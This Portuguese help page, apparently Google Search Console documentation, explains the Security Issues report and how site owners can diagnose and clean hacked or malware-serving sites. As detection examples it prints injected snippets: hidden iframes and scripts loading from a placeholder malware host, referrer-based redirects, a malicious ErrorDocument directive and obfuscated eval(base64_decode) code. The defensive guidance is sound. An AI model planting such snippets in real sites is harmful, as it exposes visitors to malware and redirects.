Relatório de problemas de segurança

Se uma avaliação do Google determinar que seu site foi invadido ou exibe um comportamento que pode prejudicar os visitantes ou os computadores deles, o relatório Problemas de segurança mostrará as descobertas do Google. Os comportamentos prejudiciais incluem ataques de phishing e a instalação de malware ou software indesejado no computador do usuário.

Páginas ou sites afetados por um problema de segurança poderão aparecer com um aviso nos resultados da pesquisa ou uma página de aviso intersticial no navegador quando um usuário tentar acessá-las.

Abrir o relatório Problemas de segurança

 

O que são problemas de segurança?

Os problemas de segurança se enquadram nas seguintes categorias:

  • Conteúdo invadido: é qualquer conteúdo colocado no seu site sem sua permissão devido a uma vulnerabilidades de segurança no site. Para proteger nossos usuários, o Google faz o possível para manter o conteúdo invadido fora dos resultados de pesquisa. Saiba mais.
  • Malware e software indesejado: define um software que é criado para prejudicar dispositivos ou usuários, está associado a práticas enganosas ou inesperadas ou afeta negativamente o usuário. Saiba mais.
  • Engenharia social: é o conteúdo que induz os usuários a fazer algo perigoso como revelar informações confidenciais ou fazer download de um software. Saiba mais.

Há problemas de segurança no meu site?

Caso haja problemas de segurança, uma contagem de todos os problemas de segurança no site será exibida na parte superior do relatório.

Se o site não tiver problemas de segurança, você verá uma marca de seleção verde e uma mensagem adequada.

Mas acabei de comprar este site!

Caso você tenha comprado recentemente um site com problemas de segurança preexistentes, corrija os itens listados no relatório Problemas de segurança e envie um pedido de reconsideração informando que você comprou o site recentemente e que agora ele está de acordo com as Diretrizes do Google para webmasters.

Que páginas foram afetadas?

Expanda a descrição de um problema para ver uma lista com amostras de URLs afetados. Essa lista não é necessariamente completa, ela exibe apenas uma amostra de páginas do site afetadas pelo problema selecionado. Em alguns casos, pode haver um problema de segurança sem exemplos de URL. Isso não significa que nenhuma página foi afetada, apenas que não conseguimos gerar amostras por algum motivo.

Os detalhes do problema mostram a data em que ele foi detectado pela primeira vez no seu site, bem como uma breve descrição e um link para saber mais.

Corrigir o problema

Para corrigir um problema de segurança no seu site:

  1. Expanda a descrição do problema no relatório Problemas de segurança.
  2. Leia a descrição do problema e acesse o link "Saiba mais" para ver informações detalhadas e as etapas necessárias para corrigir o problema. Os links "Saiba mais" direcionam para as descrições abaixo nesta página.
  3. Use as amostras de páginas afetadas na seção de detalhes para solucionar problemas. Essa lista não é necessariamente completa, ela exibe apenas uma amostra de páginas do site afetadas pelo problema. Pode haver um problema de segurança sem exemplos de URL. Isso não significa que nenhuma página foi afetada, apenas que não conseguimos gerar amostras por algum motivo.
  4. Corrija o problema em todo o seu site. Corrigir o problema em somente algumas páginas não ajudará a retornar parcialmente aos resultados de pesquisa.
  5. Se o relatório listar vários problemas de segurança que afetam o site, corrija todos eles.
  6. Teste suas correções.
  7. Quando todos os problemas listados no relatório forem corrigidos em todas as páginas, selecione Solicitar revisão no relatório Problemas de segurança. No pedido de reconsideração, descreva as correções. Um bom pedido de reconsideração segue três etapas:
    • Explica exatamente o problema de qualidade no seu site.
    • Descreve as medidas executadas para corrigir o problema.
    • Documenta o resultado dos seus esforços.
  8. As revisões de reconsideração podem levar entre uma e duas semanas. Você será informado do progresso por e-mail. Você receberá uma mensagem de confirmação de revisão ao enviar o pedido, para informar de que a revisão está em andamento. Não envie outro pedido antes de receber a decisão final sobre o que está pendente.

Quanto tempo levará a revisão da reconsideração?

Até duas semanas. Você será informado por e-mail quando recebermos seu pedido para que saiba que ele está ativo. Também receberá um e-mail quando a revisão for concluída.

Não envie o pedido novamente antes de receber uma decisão sobre os pedidos pendentes. Caso a solicitação de reconsideração seja enviada antes de o problema ser corrigido, isso poderá aumentar o tempo de retorno na próxima solicitação ou até mesmo marcar você como infrator reincidente.

Lista de problemas de segurança

Veja uma lista de possíveis problemas de segurança, com informações sobre como corrigir cada problema.

Páginas enganosas

Seu site inclui conteúdo que induz os usuários a fazer algo perigoso como revelar informações confidenciais ou fazer download de um software. O recurso Navegação segura do Google protege os usuários da Web avisando-os quando eles tentam acessar páginas que exibem conteúdo enganoso de maneira consistente.

As páginas da Web serão consideradas enganosas quando:

  • imitarem a aparência ou o comportamento de uma entidade confiável (como seu dispositivo, navegador ou o próprio website); ou
  • tentarem induzir você a fazer algo que só faria com uma entidade de confiança. Por exemplo, compartilhar uma senha, chamar a assistência técnica ou fazer download de um software.

Esse tipo de conteúdo enganoso é chamado de engenharia socialSaiba mais sobre a engenharia social ou veja exemplos de páginas enganosas.

Corrigir o problema

1. Confirme o problema

Acesse as páginas de exemplo para ver o conteúdo enganoso. Use a Ferramenta de inspeção de URL e veja o site nas visualizações para dispositivos móveis e para computadores.

2. Corrija suas páginas

Corrija todas as páginas envolvidas em engenharia social. Se você acreditar que o recurso Navegação segura classificou uma página de maneira incorreta, informe o problema aqui.

3. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Conteúdo enganoso nos recursos incorporados

Seu site inclui publicidade enganosa ou recursos incorporados que induzem os usuários a fazer algo perigoso como revelar informações confidenciais ou fazer download de um software indesejado. O conteúdo enganoso pode estar incluído em recursos incorporados na página, como imagens, anúncios ou outros componentes de terceiros. O recurso Navegação segura do Google protege os usuários da Web avisando-os quando eles tentam acessar páginas que exibem conteúdo enganoso de maneira consistente.

Às vezes, esse conteúdo é visível para os usuários na página do host. Em outros casos, o site host não contém anúncios visíveis, mas leva os usuários a páginas enganosas por meio de pop-ups, pop-unders ou outros tipos de redirecionamento. Em todos os casos, esse tipo de conteúdo incorporado resultará em uma violação da política na página.

Esse tipo de conteúdo enganoso é chamado de engenharia socialSaiba mais sobre engenharia social ou veja exemplos de recursos incorporados enganosos.

Corrigir o problema

1. Confirme o problema

Acesse as páginas de exemplo para ver o conteúdo enganoso. Verifique se há anúncios, imagens ou outros recursos de terceiros incorporados enganosos nas páginas do site. As redes de publicidade podem alternar os anúncios exibidos nas páginas do site. Portanto, talvez seja necessário atualizar a página algumas vezes até que apareça um anúncio com engenharia social. Alguns anúncios podem aparecer de maneiras diferentes em dispositivos móveis e em computadores desktop. Use a Ferramenta de inspeção de URL e veja o site nas visualizações para dispositivos móveis e para computadores.

2. Remova os anúncios ou recursos enganosos

Confira os recursos de terceiros incluídos no site. Verifique se os anúncios, as imagens ou outros recursos incorporados de terceiros nas páginas do seu site não são enganosos. Corrija todas as páginas envolvidas em engenharia social

3. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Malware
Seu site foi infectado ou está hospedando um malware de um hacker mal-intencionado. Malware é qualquer software ou aplicativo para dispositivos móveis projetado especificamente para prejudicar computadores, dispositivos móveis, usuários ou outro software.

1. Verifique se você consegue corrigir o problema

Para corrigir um problema de malware no site, é necessário ler e entender o código e possivelmente as configurações do servidor da Web para seu site. Se isso estiver além da sua zona de conforto, leia Criar uma equipe de suporte para ver como encontrar ajuda.

2. Diagnostique e corrija o malware

Existem muitos tipos de malware. Leia as seções a seguir para diagnosticar e corrigir seu tipo de malware específico. Seu site pode estar infectado por mais de um tipo de malware. Por isso, diagnostique e limpe o site com cuidado.

Tipo de malware: configuração do servidor

Descrição

Um hacker comprometeu seu site e está redirecionando os visitantes para um site invasor com malware, provavelmente modificando o arquivo de configuração do servidor. Os arquivos de configuração do servidor geralmente permitem que o administrador do site especifique redirecionamentos de URL para páginas ou diretórios específicos de um website. Por exemplo, em servidores Apache, são usados arquivos .htaccess e httpd.conf.

Corrigir o problema

1. Confirme o problema

Acesse alguns dos URLs de exemplo mostrados no relatório Problemas de segurança.

Evite usar um navegador para visualizar diretamente as páginas infectadas no seu site.

Como muitas vezes o malware se espalha explorando vulnerabilidades do navegador, abrir uma página infectada com malware em um navegador pode danificar seu computador. Além disso, hackers podem ocultar o conteúdo com spam usando técnicas de cloaking para evitar a detecção pelos proprietários do site.

Veja dois métodos alternativos para visualizar o conteúdo com mais segurança no seu computador:

  • Use a Ferramenta de inspeção de URL para ver a página da forma como ela é processada pelo Google. Isso é útil porque muitos hackers fazem alterações que só são detectadas pelas máquinas do Google. Por exemplo, eles podem adicionar links que são renderizados somente quando o referenciador é o Google e levam do seu site para os deles.
  • Use o cURL ou o Wget para fazer solicitações HTTP (como buscar uma página) pela linha de comando. Essas ferramentas disponíveis gratuitamente são úteis para diagnosticar redirecionamentos e podem incluir informações do referenciador ou do user agent. Os hackers geralmente atacam somente user agents ou referenciadores específicos para evitar a detecção e selecionar alvos melhores. Usando essas ferramentas, você pode imitar um alvo. Tente usar endereços de referenciadores diferentes (como links de sites grandes ou mecanismos de pesquisa diferentes) se sua solicitação não provocar o comportamento de spam. Por exemplo, para imitar um usuário seguindo um link dos resultados da Pesquisa Google para www.example.com/page.html em um computador Windows, você usaria cURL desta forma:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

A resposta de uma página com uma infecção do tipo "configuração do servidor" pode incluir os seguintes cabeçalhos:

…
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Remova o malware do tipo "configuração do servidor" do seu site

Faça login no seu servidor por meio do shell/terminal (o site pode estar off-line, se você quiser) e analise os arquivos de configuração relevantes do servidor. Pode haver mais de um arquivo de configuração do servidor invadido no site. Verifique se esses arquivos contêm diretivas indesejadas, como redirecionamentos, em que o hacker pode configurar seu site para que ele redirecione para sites com malware desconhecido. Por exemplo, pode haver um redirecionamento como este no arquivo .htaccess:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

Além disso:

  • Verifique todo o arquivo, pois o hacker pode ter adicionado seu código ao fim dele, ponto em que o código seria mais facilmente ignorado.
  • Investigue possíveis tarefas agendadas criadas pelo hacker, projetadas para atualizar continuamente o arquivo .htaccess. As tarefas agendadas podem ser listadas em vários locais, incluindo /etc/crontab (também em vários diretórios /etc/cron*) e /var/spool/cron.
  • Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente.
Tipo de malware: injeção de SQL

Descrição

Um hacker provavelmente comprometeu o banco de dados do seu site. Por exemplo, o hacker pode ter programaticamente inserido um código malicioso em todos os registros de uma tabela do banco de dados, de modo que, quando o servidor carregar uma página que requer informações do banco de dados, o código malicioso estará incorporado ao conteúdo da página e poderá prejudicar os visitantes do site .

Corrigir o problema

1. Confirme o problema

Faça algumas consultas pela linha de comando nos URLs afetados e analise a resposta para procurar palavras de ataque no SQL, como "iframe" ou "eval".

Evite usar um navegador para visualizar diretamente as páginas infectadas no seu site.

Como muitas vezes o malware se espalha explorando vulnerabilidades do navegador, abrir uma página infectada com malware em um navegador pode danificar seu computador. Além disso, hackers podem ocultar o conteúdo com spam usando técnicas de cloaking para evitar a detecção pelos proprietários do site.

Veja dois métodos alternativos para visualizar o conteúdo com mais segurança no seu computador:

  • Use a Ferramenta de inspeção de URL para ver a página da forma como ela é processada pelo Google. Isso é útil porque muitos hackers fazem alterações que só são detectadas pelas máquinas do Google. Por exemplo, eles podem adicionar links que são renderizados somente quando o referenciador é o Google e levam do seu site para os deles.
  • Use o cURL ou o Wget para fazer solicitações HTTP (como buscar uma página) pela linha de comando. Essas ferramentas disponíveis gratuitamente são úteis para diagnosticar redirecionamentos e podem incluir informações do referenciador ou do user agent. Os hackers geralmente atacam somente user agents ou referenciadores específicos para evitar a detecção e selecionar alvos melhores. Usando essas ferramentas, você pode imitar um alvo. Tente usar endereços de referenciadores diferentes (como links de sites grandes ou mecanismos de pesquisa diferentes) se sua solicitação não provocar o comportamento de spam. Por exemplo, para imitar um usuário seguindo um link dos resultados da Pesquisa Google para www.example.com/page.html em um computador Windows, você usaria cURL desta forma:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Em seguida, faça login no seu servidor de banco de dados ou visualize o banco de dados por meio de uma ferramenta como phpMyAdmin. Se você usou Wget ou cURL, tente correlacionar o dano encontrado no código-fonte da página por meio de Wget ou cURL com as entradas reais do banco de dados. Por exemplo, se você notou que suas páginas incluíam um iframe perigoso, pode executar uma consulta SQL em busca de um código iframe. Por exemplo:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

Também é possível verificar se há atividade incomum no log do banco de dados e nos arquivos de erro no seu servidor, como comandos SQL inesperados que parecem anormais para usuários regulares ou que parecem erros.

2. Limpe seu site

Quando estiver pronto para limpar seu site, atualize todos os registros infectados do banco de dados ou restaure seu último backup do banco de dados.

Além disso:

  • Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente.
Tipo de malware: injeção de código

Descrição

As páginas do site foram modificadas para incluir código malicioso, como um iframe para um site invasor com malware.

Corrigir o problema

1. Confirme o problema

Acesse os URLs listados como infectados no relatório Problemas de segurança. Examine o HTML das respostas e verifique se há código malicioso.

Evite usar um navegador para visualizar diretamente as páginas infectadas no seu site.

Como muitas vezes o malware se espalha explorando vulnerabilidades do navegador, abrir uma página infectada com malware em um navegador pode danificar seu computador. Além disso, hackers podem ocultar o conteúdo com spam usando técnicas de cloaking para evitar a detecção pelos proprietários do site.

Veja dois métodos alternativos para visualizar o conteúdo com mais segurança no seu computador:

  • Use a Ferramenta de inspeção de URL para ver a página da forma como ela é processada pelo Google. Isso é útil porque muitos hackers fazem alterações que só são detectadas pelas máquinas do Google. Por exemplo, eles podem adicionar links que são renderizados somente quando o referenciador é o Google e levam do seu site para os deles.
  • Use o cURL ou o Wget para fazer solicitações HTTP (como buscar uma página) pela linha de comando. Essas ferramentas disponíveis gratuitamente são úteis para diagnosticar redirecionamentos e podem incluir informações do referenciador ou do user agent. Os hackers geralmente atacam somente user agents ou referenciadores específicos para evitar a detecção e selecionar alvos melhores. Usando essas ferramentas, você pode imitar um alvo. Tente usar endereços de referenciadores diferentes (como links de sites grandes ou mecanismos de pesquisa diferentes) se sua solicitação não provocar o comportamento de spam. Por exemplo, para imitar um usuário seguindo um link dos resultados da Pesquisa Google para www.example.com/page.html em um computador Windows, você usaria cURL desta forma:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Veja alguns exemplos de código malicioso:

  • Iframe que carrega um site malicioso:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript ou outra linguagem de script que chama e usa scripts de um site invasor:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Scripts que redirecionam o navegador para um site invasor:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • Código malicioso que é ofuscado para evitar a detecção:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Arquivos de objetos compartilhados elaborados para escrever aleatoriamente códigos nocivos em scripts que seriam benignos:
    #httpd.conf modificado pelo hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Investigue todos os possíveis códigos nocivos presentes no site. Talvez seja útil pesquisar palavras como "iframe" para encontrar código de iframe. Outras palavras-chave úteis são "script", "eval" e "unescape" para pesquisar, por exemplo, por "iframe" em todos os arquivos em sistemas baseados em Unix:

$grep -irn "iframe" ./ | less

2. Limpe seu site

Quando estiver pronto para limpar seu site, substitua os arquivos afetados pelo último backup válido deles ou remova a injeção de código de cada página e todas as funções ou arquivos de script relacionados. Se você modificar os arquivos de configuração do servidor, poderá precisar reiniciar o servidor para que as alterações entrem em vigor.

Além disso:

  • Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente.
Tipo de malware: modelo de erro

Descrição

O modelo usado por mensagens de erro, como "404 Arquivo não encontrado", está configurado para distribuir malware. Dessa forma, os agressores podem lançar ataques em URLs que nem sequer existem no seu site.

Corrigir o problema

1. Confirme o problema

Solicite uma página no site que não exista ou que exiba outro tipo de erro. Em seguida, examine a resposta para verificar se ela foi enviada por outro site ou contém malware.

Evite usar um navegador para visualizar diretamente as páginas infectadas no seu site.

Como muitas vezes o malware se espalha explorando vulnerabilidades do navegador, abrir uma página infectada com malware em um navegador pode danificar seu computador. Além disso, hackers podem ocultar o conteúdo com spam usando técnicas de cloaking para evitar a detecção pelos proprietários do site.

Veja dois métodos alternativos para visualizar o conteúdo com mais segurança no seu computador:

  • Use a Ferramenta de inspeção de URL para ver a página da forma como ela é processada pelo Google. Isso é útil porque muitos hackers fazem alterações que só são detectadas pelas máquinas do Google. Por exemplo, eles podem adicionar links que são renderizados somente quando o referenciador é o Google e levam do seu site para os deles.
  • Use o cURL ou o Wget para fazer solicitações HTTP (como buscar uma página) pela linha de comando. Essas ferramentas disponíveis gratuitamente são úteis para diagnosticar redirecionamentos e podem incluir informações do referenciador ou do user agent. Os hackers geralmente atacam somente user agents ou referenciadores específicos para evitar a detecção e selecionar alvos melhores. Usando essas ferramentas, você pode imitar um alvo. Tente usar endereços de referenciadores diferentes (como links de sites grandes ou mecanismos de pesquisa diferentes) se sua solicitação não provocar o comportamento de spam. Por exemplo, para imitar um usuário seguindo um link dos resultados da Pesquisa Google para www.example.com/page.html em um computador Windows, você usaria cURL desta forma:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Limpe seu site

Faça login no seu servidor da Web e verifique as diretivas de página de erro nos arquivos de configuração do servidor. Por exemplo, o modelo de erro para servidores da web Apache pode ser declarado no arquivo .htaccess. Veja um exemplo de entrada no arquivo .htaccess que usa páginas de erro 404 de um site malicioso:

ErrorDocument 404 http://<malware-site>/index.html 

Quando estiver pronto para limpar seu site, substitua os arquivos .htaccess por um backup conhecido ou exclua as diretivas ErrorDocument indesejadas nos arquivos .htaccess. Não deixe de limpar os arquivos de erro reais, se eles existirem no seu site. Por último, reinicie o servidor da Web para se certificar de que todas as alterações entraram em vigor.

Além disso:

  • Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente.
Tipo de malware: malware entre sites

Descrição

O site carrega conteúdo de um site conhecido por conter conteúdo malicioso. No Chrome, isso é indicado por um intersticial no navegador com a seguinte imagem:

cross-site malware warning

Corrigir o problema​

  1. Para confirmar o problema, acesse alguns dos URLs de amostra listados no relatório Problemas de segurança. Você verá a imagem acima caso o problema seja um malware entre sites.
  2. O aviso do navegador informará o domínio do conteúdo questionável. Remova todas as referências ao site listado no aviso do navegador.
  3. Se você descobrir que uma página do site inclui conteúdo de um site sinalizado sem seu conhecimento, isso indicará que o problema é mais sério e que seu site provavelmente foi comprometido. Em ambos os casos, o Google recomenda o protocolo de recuperação Ajuda para sites invadidos para colocar seu site em quarentena, avaliar o dano e limpar o site.
  4. Após remover todo o conteúdo de engenharia social do seu site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.
  5. Se você incluiu intencionalmente conteúdo de um site legítimo que foi sinalizado e quiser adicionar novamente o conteúdo após a limpeza, monitore o status do site sinalizado usando a página de diagnóstico Navegação segura do Google para o site em questão (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). Em geral, sites legítimos são limpos rapidamente pelos proprietários.
Outros tipos de malware

Há muitos outros tipos de malware que podem afetar seu site. Consulte o site Fundamentos da Web para ver mais dicas sobre como diagnosticar e corrigir outros tipos de invasões. Depois de corrigir seu site, solicite uma revisão.

3. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Tipo invadido: injeção de código

Um hacker comprometeu seu site e está injetando códigos maliciosos nas páginas. Exemplos desse tipo de invasão incluem redirecionamentos para um site malicioso ou uso de software de mineração de criptomoeda no navegador enquanto a página está aberta.

1. Verifique se você consegue corrigir o problema

Consulte Criar uma equipe de suporte para ver o que é necessário para corrigir o problema sozinho ou como encontrar ajuda, se isso estiver além das suas habilidades.

2. Confirme o problema

Evite usar um navegador para visualizar diretamente as páginas infectadas no seu site.

Como muitas vezes o malware se espalha explorando vulnerabilidades do navegador, abrir uma página infectada com malware em um navegador pode danificar seu computador. Além disso, hackers podem ocultar o conteúdo com spam usando técnicas de cloaking para evitar a detecção pelos proprietários do site.

Veja dois métodos alternativos para visualizar o conteúdo com mais segurança no seu computador:

  • Use a Ferramenta de inspeção de URL para ver a página da forma como ela é processada pelo Google. Isso é útil porque muitos hackers fazem alterações que só são detectadas pelas máquinas do Google. Por exemplo, eles podem adicionar links que são renderizados somente quando o referenciador é o Google e levam do seu site para os deles.
  • Use o cURL ou o Wget para fazer solicitações HTTP (como buscar uma página) pela linha de comando. Essas ferramentas disponíveis gratuitamente são úteis para diagnosticar redirecionamentos e podem incluir informações do referenciador ou do user agent. Os hackers geralmente atacam somente user agents ou referenciadores específicos para evitar a detecção e selecionar alvos melhores. Usando essas ferramentas, você pode imitar um alvo. Tente usar endereços de referenciadores diferentes (como links de sites grandes ou mecanismos de pesquisa diferentes) se sua solicitação não provocar o comportamento de spam. Por exemplo, para imitar um usuário seguindo um link dos resultados da Pesquisa Google para www.example.com/page.html em um computador Windows, você usaria cURL desta forma:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

O hacker pode ter injetado o código malicioso diretamente em arquivos HTML do site (por exemplo, um redirecionamento JavaScript) ou em arquivos que geram o conteúdo do site (por exemplo, arquivos PHP).

Busque uma página comprometida listada no relatório e examine a resposta. Os hackers podem usar várias técnicas para redirecionar os visitantes do seu site para as páginas deles. Veja algumas delas:

  • Redirecionamento:​
    • Redirecionamentos de cabeçalho: os hackers podem redirecionar os visitantes modificando os arquivos de configuração do servidor. Os arquivos de configuração do servidor geralmente permitem que o administrador do site especifique redirecionamentos de URL para páginas ou diretórios específicos de um website. Por exemplo, em servidores Apache, são usados arquivos .htaccess e httpd.conf.
      …
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • Redirecionamentos JavaScript:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • JavaScript malicioso carregado de outro site:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Código malicioso ofuscado para evitar a detecção:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Procure códigos suspeitos nas respostas e no site. Termos de pesquisa úteis incluem "search", "eval", "base64_decode" e "unescape".

3. Limpe seu site

Quando estiver pronto para limpar seu site, substitua os arquivos afetados pelo último backup válido ou remova você mesmo o conteúdo de spam.

Além disso:

  • Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente.

4. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Tipo invadido: injeção de conteúdo

Um hacker adicionou links ou textos de spam às páginas do seu site. O conteúdo injetado pode conter termos farmacêuticos ou outro spam não relacionado ao conteúdo do site.

Normalmente, os hackers modificam o site em uma das seguintes formas:

  • Ao ganhar acesso a um diretório não seguro em seu servidor. Por exemplo, é possível que você tenha, inadvertidamente, deixado um diretório com permissões abertas.
  • Ao explorar uma vulnerabilidade no software do site, como um sistema de gerenciamento de conteúdo. Por exemplo, talvez você tenha uma versão mais antiga e não segura do Drupal, Joomla! ou WordPress.
  • Ao invadir plug-ins de terceiros usados no seu site, como contadores de visitantes.

1. Verifique se você consegue corrigir o problema

Consulte Criar uma equipe de suporte para ver o que é necessário para corrigir o problema sozinho ou como encontrar ajuda, se isso estiver além das suas habilidades.

2. Confirme o problema

Evite usar um navegador para visualizar diretamente as páginas infectadas no seu site.

Como muitas vezes o malware se espalha explorando vulnerabilidades do navegador, abrir uma página infectada com malware em um navegador pode danificar seu computador. Além disso, hackers podem ocultar o conteúdo com spam usando técnicas de cloaking para evitar a detecção pelos proprietários do site.

Veja dois métodos alternativos para visualizar o conteúdo com mais segurança no seu computador:

  • Use a Ferramenta de inspeção de URL para ver a página da forma como ela é processada pelo Google. Isso é útil porque muitos hackers fazem alterações que só são detectadas pelas máquinas do Google. Por exemplo, eles podem adicionar links que são renderizados somente quando o referenciador é o Google e levam do seu site para os deles.
  • Use o cURL ou o Wget para fazer solicitações HTTP (como buscar uma página) pela linha de comando. Essas ferramentas disponíveis gratuitamente são úteis para diagnosticar redirecionamentos e podem incluir informações do referenciador ou do user agent. Os hackers geralmente atacam somente user agents ou referenciadores específicos para evitar a detecção e selecionar alvos melhores. Usando essas ferramentas, você pode imitar um alvo. Tente usar endereços de referenciadores diferentes (como links de sites grandes ou mecanismos de pesquisa diferentes) se sua solicitação não provocar o comportamento de spam. Por exemplo, para imitar um usuário seguindo um link dos resultados da Pesquisa Google para www.example.com/page.html em um computador Windows, você usaria cURL desta forma:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Busque algumas páginas do seu site e verifique se há conteúdo suspeito ou links não adicionados por você nas respostas. Por exemplo, pesquise por produtos farmacêuticos ou termos relacionados a spam como "viagra" ou "ganhar dinheiro".

3. Limpe seu site

Quando estiver pronto para limpar seu site, substitua os arquivos afetados pelo último backup válido ou remova o conteúdo com spam e os links de todas as páginas. Corrija todos os exemplos de invasão mostrados no relatório Problemas de segurança. Além disso, procure outras páginas do seu site que possam ter sido invadidas usando a opção "site:" no Google e pesquisando os arquivos de origem do site.

Além disso:

  • Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente.

4. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Tipo invadido: injeção de URL

Um hacker criou novas páginas no seu site contendo palavras ou links com spam. Às vezes, essas novas páginas contêm um código que não age da forma pretendida, redirecionando os usuários para outros sites ou colocando o servidor para participar de um ataque de negação de serviço contra outros sites.

1. Verifique se você consegue corrigir o problema

Consulte Criar uma equipe de suporte para ver o que é necessário para corrigir o problema sozinho ou como encontrar ajuda, se isso estiver além das suas habilidades.

2. Confirme o problema

Evite usar um navegador para visualizar diretamente as páginas infectadas no seu site.

Como muitas vezes o malware se espalha explorando vulnerabilidades do navegador, abrir uma página infectada com malware em um navegador pode danificar seu computador. Além disso, hackers podem ocultar o conteúdo com spam usando técnicas de cloaking para evitar a detecção pelos proprietários do site.

Veja dois métodos alternativos para visualizar o conteúdo com mais segurança no seu computador:

  • Use a Ferramenta de inspeção de URL para ver a página da forma como ela é processada pelo Google. Isso é útil porque muitos hackers fazem alterações que só são detectadas pelas máquinas do Google. Por exemplo, eles podem adicionar links que são renderizados somente quando o referenciador é o Google e levam do seu site para os deles.
  • Use o cURL ou o Wget para fazer solicitações HTTP (como buscar uma página) pela linha de comando. Essas ferramentas disponíveis gratuitamente são úteis para diagnosticar redirecionamentos e podem incluir informações do referenciador ou do user agent. Os hackers geralmente atacam somente user agents ou referenciadores específicos para evitar a detecção e selecionar alvos melhores. Usando essas ferramentas, você pode imitar um alvo. Tente usar endereços de referenciadores diferentes (como links de sites grandes ou mecanismos de pesquisa diferentes) se sua solicitação não provocar o comportamento de spam. Por exemplo, para imitar um usuário seguindo um link dos resultados da Pesquisa Google para www.example.com/page.html em um computador Windows, você usaria cURL desta forma:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Consulte os exemplos de URLs listados no relatório para ver se eles estão ativos. Provavelmente, essas páginas não foram criadas por você. Portanto, será necessário removê-las do seu site ou eliminar o código que gera as páginas automaticamente. Leia como encontrar e limpar essas páginas do seu site.

Você também pode pesquisar com a opção "site:" para encontrar as páginas que você não criou.

  • Em um site pequeno, pesquise por [site:example.com] na Pesquisa Google para ver uma lista de páginas indexadas e verificar se alguma delas não foi criada por você.
  • No caso de sites maiores, use uma consulta mais específica, por exemplo:

3. Limpe seu site

Quando estiver pronto para limpar seu site, substitua os diretórios afetados pelo último backup válido ou remova as páginas indesejadas e os arquivos ou as funções que o hacker usou para criá-las.

Além disso:

  • Leia o guia de sites invadidos e veja o fluxo de correção completo para seu site, incluindo etapas de limpeza e dicas para impedir que o site seja invadido novamente.

4. Solicite uma revisão

Quando você confirmar que o problema foi corrigido no site, solicite uma análise de segurança no relatório Problemas de segurança. A análise pode levar de alguns dias a algumas semanas.

Downloads incomuns

Seu site oferece um download que a Navegação segura do Google não viu antes. O navegador Chrome avisa sobre downloads incomuns e potencialmente perigosos. Esses avisos serão suspensos automaticamente quando o recurso de Navegação segura do Google verificar que os arquivos são seguros.

1. Corrija o problema

Verifique e confirme se seus downloads estão de acordo com as diretrizes de download. Se houver downloads que violem essas diretrizes, remova-os. Se eles não violarem as diretrizes, não será necessário removê-los, basta solicitar uma revisão, conforme descrito a seguir. Nem sempre são fornecidos URLs de exemplo para o problema.

